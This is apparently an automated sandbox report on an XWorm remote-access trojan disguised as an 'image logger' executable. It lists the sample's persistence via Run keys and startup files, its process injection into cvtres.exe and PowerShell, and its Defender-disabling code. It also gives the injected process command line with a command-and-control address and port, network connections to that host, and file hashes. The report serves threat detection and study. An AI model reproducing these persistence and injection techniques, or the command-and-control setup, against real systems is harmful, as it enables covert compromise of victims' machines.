Malware Analysis Report

2024-11-16 13:30

Sample ID 240621-pnlb2atcql
Target X Image logger beta V5.2.exe
SHA256 5efe623eb5e9326ae70270135f6dcf2e3b48a62daef1f1685e3f1f0445db5de4
Tags
xworm persistence rat trojan
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

5efe623eb5e9326ae70270135f6dcf2e3b48a62daef1f1685e3f1f0445db5de4

Threat Level: Known bad

The file X Image logger beta V5.2.exe was found to be: Known bad.

Malicious Activity Summary

xworm persistence rat trojan

Xworm

Contains code to disable Windows Defender

Detect Xworm Payload

Executes dropped EXE

Deletes itself

Drops startup file

Looks up external IP address via web service

Adds Run key to start application

Suspicious use of SetThreadContext

Unsigned PE

Enumerates physical storage devices

Suspicious use of SetWindowsHookEx

Suspicious use of WriteProcessMemory

Suspicious use of SendNotifyMessage

Modifies registry class

Suspicious use of FindShellTrayWindow

Suspicious use of AdjustPrivilegeToken

Suspicious behavior: GetForegroundWindowSpam

Modifies Internet Explorer settings

Suspicious behavior: AddClipboardFormatListener

Suspicious behavior: EnumeratesProcesses

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-06-21 12:28

Signatures

Unsigned PE

Description Indicator Process Target
N/A N/A N/A N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-06-21 12:28

Reported

2024-06-21 12:32

Platform

win11-20240611-en

Max time kernel

228s

Max time network

241s

Command Line

"C:\Users\Admin\AppData\Local\Temp\X Image logger beta V5.2.exe"

Signatures

Contains code to disable Windows Defender

Description Indicator Process Target
N/A N/A N/A N/A

Detect Xworm Payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

Xworm

trojan rat xworm

Deletes itself

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\X Image logger beta V5.2.exe N/A

Drops startup file

Description Indicator Process Target
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Anti root backup.lnk C:\Users\Admin\AppData\Local\Temp\RarSFX0\X Image logger beta V5.2.exe N/A
File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Anti root backup.lnk C:\Users\Admin\AppData\Local\Temp\RarSFX0\X Image logger beta V5.2.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\X Image logger beta V5.2.exe N/A

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-1560405787-796225086-678739705-1000\Software\Microsoft\Windows\CurrentVersion\Run\Anti root backup = "C:\\Users\\Admin\\Anti root backup" C:\Users\Admin\AppData\Local\Temp\RarSFX0\X Image logger beta V5.2.exe N/A

Looks up external IP address via web service

Description Indicator Process Target
N/A ip-api.com N/A N/A

Suspicious use of SetThreadContext

Description Indicator Process Target
PID 4028 set thread context of 4600 N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\X Image logger beta V5.2.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe

Enumerates physical storage devices

Modifies Internet Explorer settings

adware spyware
Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-1560405787-796225086-678739705-1000\Software\Microsoft\Internet Explorer\Toolbar C:\Windows\explorer.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-1560405787-796225086-678739705-1000\Software\Microsoft\Internet Explorer\Toolbar\Locked = "1" C:\Windows\explorer.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1560405787-796225086-678739705-1000\Software\Microsoft\Internet Explorer\Toolbar\ShellBrowser C:\Windows\explorer.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-1560405787-796225086-678739705-1000\Software\Microsoft\Internet Explorer\Toolbar\ShellBrowser\ITBar7Layout = 13000000000000000000000020000000100000000000000001000000010700005e01000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 C:\Windows\explorer.exe N/A

Modifies registry class

Description Indicator Process Target
Set value (data) \REGISTRY\USER\S-1-5-21-1560405787-796225086-678739705-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = ffffffff C:\Windows\explorer.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-1560405787-796225086-678739705-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\MRUListEx = 00000000ffffffff C:\Windows\explorer.exe N/A
Key created \Registry\User\S-1-5-21-1560405787-796225086-678739705-1000_Classes\NotificationData C:\Windows\explorer.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{4336a54d-038b-4685-ab02-99bb52d3fb8b}\Instance\ C:\Windows\explorer.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-1560405787-796225086-678739705-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots C:\Windows\explorer.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-1560405787-796225086-678739705-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0 = 14001f50e04fd020ea3a6910a2d808002b30309d0000 C:\Windows\explorer.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-1560405787-796225086-678739705-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\MRUListEx = ffffffff C:\Windows\explorer.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1560405787-796225086-678739705-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\Shell C:\Windows\explorer.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1560405787-796225086-678739705-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags C:\Windows\explorer.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1560405787-796225086-678739705-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1 C:\Windows\explorer.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1560405787-796225086-678739705-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\Shell\SniffedFolderType = "Documents" C:\Windows\explorer.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1560405787-796225086-678739705-1000_Classes\Local Settings C:\Windows\explorer.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1560405787-796225086-678739705-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU C:\Windows\explorer.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-1560405787-796225086-678739705-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = 00000000ffffffff C:\Windows\explorer.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-1560405787-796225086-678739705-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0 = 14002e80922b16d365937a46956b92703aca08af0000 C:\Windows\explorer.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-1560405787-796225086-678739705-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots = 02 C:\Windows\explorer.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-1560405787-796225086-678739705-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\NodeSlot = "1" C:\Windows\explorer.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1560405787-796225086-678739705-1000_Classes\CLSID\{018D5C66-4533-4307-9B53-224DE2ED1FE6}\Instance\ C:\Windows\explorer.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1560405787-796225086-678739705-1000_Classes\Local Settings\MuiCache C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\MiniSearchHost.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1560405787-796225086-678739705-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell C:\Windows\explorer.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1560405787-796225086-678739705-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0 C:\Windows\explorer.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1560405787-796225086-678739705-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0 C:\Windows\explorer.exe N/A

Suspicious behavior: AddClipboardFormatListener

Description Indicator Process Target
N/A N/A C:\Windows\explorer.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\X Image logger beta V5.2.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\X Image logger beta V5.2.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\X Image logger beta V5.2.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\X Image logger beta V5.2.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\X Image logger beta V5.2.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\X Image logger beta V5.2.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\X Image logger beta V5.2.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\X Image logger beta V5.2.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\X Image logger beta V5.2.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\X Image logger beta V5.2.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\X Image logger beta V5.2.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\X Image logger beta V5.2.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\X Image logger beta V5.2.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\X Image logger beta V5.2.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\X Image logger beta V5.2.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\X Image logger beta V5.2.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\X Image logger beta V5.2.exe N/A

Suspicious behavior: GetForegroundWindowSpam

Description Indicator Process Target
N/A N/A C:\Windows\explorer.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\X Image logger beta V5.2.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\X Image logger beta V5.2.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeShutdownPrivilege N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\X Image logger beta V5.2.exe N/A

Suspicious use of SetWindowsHookEx

Description Indicator Process Target
N/A N/A C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\MiniSearchHost.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 1516 wrote to memory of 4028 N/A C:\Users\Admin\AppData\Local\Temp\X Image logger beta V5.2.exe C:\Users\Admin\AppData\Local\Temp\RarSFX0\X Image logger beta V5.2.exe
PID 1516 wrote to memory of 4028 N/A C:\Users\Admin\AppData\Local\Temp\X Image logger beta V5.2.exe C:\Users\Admin\AppData\Local\Temp\RarSFX0\X Image logger beta V5.2.exe
PID 4028 wrote to memory of 4600 N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\X Image logger beta V5.2.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
PID 4028 wrote to memory of 4600 N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\X Image logger beta V5.2.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
PID 4028 wrote to memory of 4600 N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\X Image logger beta V5.2.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
PID 4028 wrote to memory of 4600 N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\X Image logger beta V5.2.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
PID 4028 wrote to memory of 4600 N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\X Image logger beta V5.2.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
PID 4028 wrote to memory of 4600 N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\X Image logger beta V5.2.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
PID 4028 wrote to memory of 4600 N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\X Image logger beta V5.2.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
PID 4028 wrote to memory of 4600 N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\X Image logger beta V5.2.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
PID 4600 wrote to memory of 3876 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 4600 wrote to memory of 3876 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 4600 wrote to memory of 3876 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 3876 wrote to memory of 1324 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\explorer.exe
PID 3876 wrote to memory of 1324 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\explorer.exe
PID 3876 wrote to memory of 1324 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\explorer.exe

Processes

C:\Users\Admin\AppData\Local\Temp\X Image logger beta V5.2.exe

"C:\Users\Admin\AppData\Local\Temp\X Image logger beta V5.2.exe"

C:\Users\Admin\AppData\Local\Temp\RarSFX0\X Image logger beta V5.2.exe

"C:\Users\Admin\AppData\Local\Temp\RarSFX0\X Image logger beta V5.2.exe"

C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\MiniSearchHost.exe

"C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\MiniSearchHost.exe" -ServerName:MiniSearchUI.AppXj3y73at8fy1htwztzxs68sxx1v7cksp7.mca

C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe" 147.185.221.20 23695 <123456789> 6F39F110501D9DF4D96A

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -c explorer shell:::{3080F90E-D7AD-11D9-BD98-0000947B0257}

C:\Windows\SysWOW64\explorer.exe

"C:\Windows\system32\explorer.exe" shell::: -encodedCommand MwAwADgAMABGADkAMABFAC0ARAA3AEEARAAtADEAMQBEADkALQBCAEQAOQA4AC0AMAAwADAAMAA5ADQANwBCADAAMgA1ADcA -inputFormat xml -outputFormat text

C:\Windows\explorer.exe

C:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding

C:\Windows\System32\rundll32.exe

C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {3eef301f-b596-4c0b-bd92-013beafce793} -Embedding

Network

Country Destination Domain Proto
US 8.8.8.8:53 ip-api.com udp
US 208.95.112.1:80 ip-api.com tcp
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp
US 147.185.221.20:23695 modern-educators.gl.at.ply.gg tcp
US 147.185.221.20:23695 modern-educators.gl.at.ply.gg tcp
US 147.185.221.20:23695 modern-educators.gl.at.ply.gg tcp

Files

C:\Users\Admin\AppData\Local\Temp\RarSFX0\X Image logger beta V5.2.exe

MD5 060295a703861c237ad7bc31553a7957
SHA1 07185d1bf97ac9bd46b2767cc42abaf32ad85aab
SHA256 2f0eafb4fddbe251965522b1ad3190baf20a8921b5e1672f0b795a8e6e84bcc3
SHA512 ee681def62064e1ee3d6fc4ddd51edb44d0897fb64c3cfa2daab0c8a9b32db20dbe66efbc8f10fde65d38dce028837a3882473fd882fef34fbbb4c3e02bd947d

memory/4028-12-0x00007FF8EAC63000-0x00007FF8EAC65000-memory.dmp

memory/4028-13-0x0000000000600000-0x000000000064C000-memory.dmp

memory/4028-14-0x00007FF8EAC60000-0x00007FF8EB722000-memory.dmp

memory/4028-18-0x00007FF8EAC63000-0x00007FF8EAC65000-memory.dmp

memory/4028-19-0x00007FF8EAC60000-0x00007FF8EB722000-memory.dmp

memory/4028-20-0x0000000000E90000-0x0000000000E98000-memory.dmp

memory/4028-22-0x000000001C140000-0x000000001C14A000-memory.dmp

C:\Users\Admin\AppData\Local\Packages\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\TempState\~earchHoverUnifiedTileModelCache.tmp

MD5 9a7af7f1f08f7de9da3ba647286ee5a6
SHA1 d7a23961ba5f8c4242a03f20686ff516c2ae432c
SHA256 dddc3d322b46ec53927c26326a4f4d573dec131fbe668450f984c91c3104a08b
SHA512 64b0d94e68aa2d0ee9d02f170de6989f5255c5c57d05dffbf4dbbe012dae43a6f4dbd59c6a85fd2621fb84ae7f4cdf486a089b90e3e6c4fce1b152ba5aa6ba58

C:\Users\Admin\AppData\Local\Packages\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\TempState\SearchHoverUnifiedTileModelCache.dat

MD5 35745802ec2865acb4c60e651e5a8620
SHA1 f10c746a71c2741790aa3f5160ea7d9be1a1920a
SHA256 ef386e977e9fcfc811f2710d0d630e23e2278cf9811770da0c2f10f3965b7a63
SHA512 0031f739cafa1089dc655a3509bc215fc900c20734507a1b0b69f1ad1567fb2fe4af725360cf952a4689e89973bbd59a53ea6ff8bd6c4c67b9e732f66f14a42f

memory/4028-42-0x000000001C180000-0x000000001C196000-memory.dmp

memory/4600-44-0x00000000003C0000-0x00000000003D0000-memory.dmp

memory/4600-45-0x0000000005050000-0x00000000050E2000-memory.dmp

memory/4600-46-0x00000000050F0000-0x000000000518C000-memory.dmp

memory/4600-47-0x0000000005740000-0x0000000005CE6000-memory.dmp

memory/4600-48-0x0000000005320000-0x0000000005386000-memory.dmp

memory/3876-49-0x0000000002630000-0x0000000002666000-memory.dmp

memory/3876-50-0x0000000004DC0000-0x00000000053EA000-memory.dmp

memory/3876-51-0x0000000004B10000-0x0000000004B32000-memory.dmp

memory/3876-52-0x0000000004BB0000-0x0000000004C16000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_tjri0jiw.hnb.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/3876-61-0x00000000055B0000-0x0000000005907000-memory.dmp

memory/3876-62-0x0000000005AD0000-0x0000000005AEE000-memory.dmp

memory/3876-63-0x0000000005B60000-0x0000000005BAC000-memory.dmp

memory/4028-72-0x000000001B5B0000-0x000000001B5BE000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\Explorer\iconcache_idx.db

MD5 3df44998aca4a87ccc0633ceade8752c
SHA1 7417391df4b0deb676e12d2c81aa3df265b2cf31
SHA256 0df3cba256cf8e1e6e2f78b5f33ed790dd69fb4b5a72fa3b9aa43a825c4ba0fd
SHA512 1c23132999185938961053c2435247a7365e3de1e9efd4d56be23972fb6ae10cb8101d09380933e9941b588b847e7bd235d57c31e28b2dbd1f66d0a06b3429cb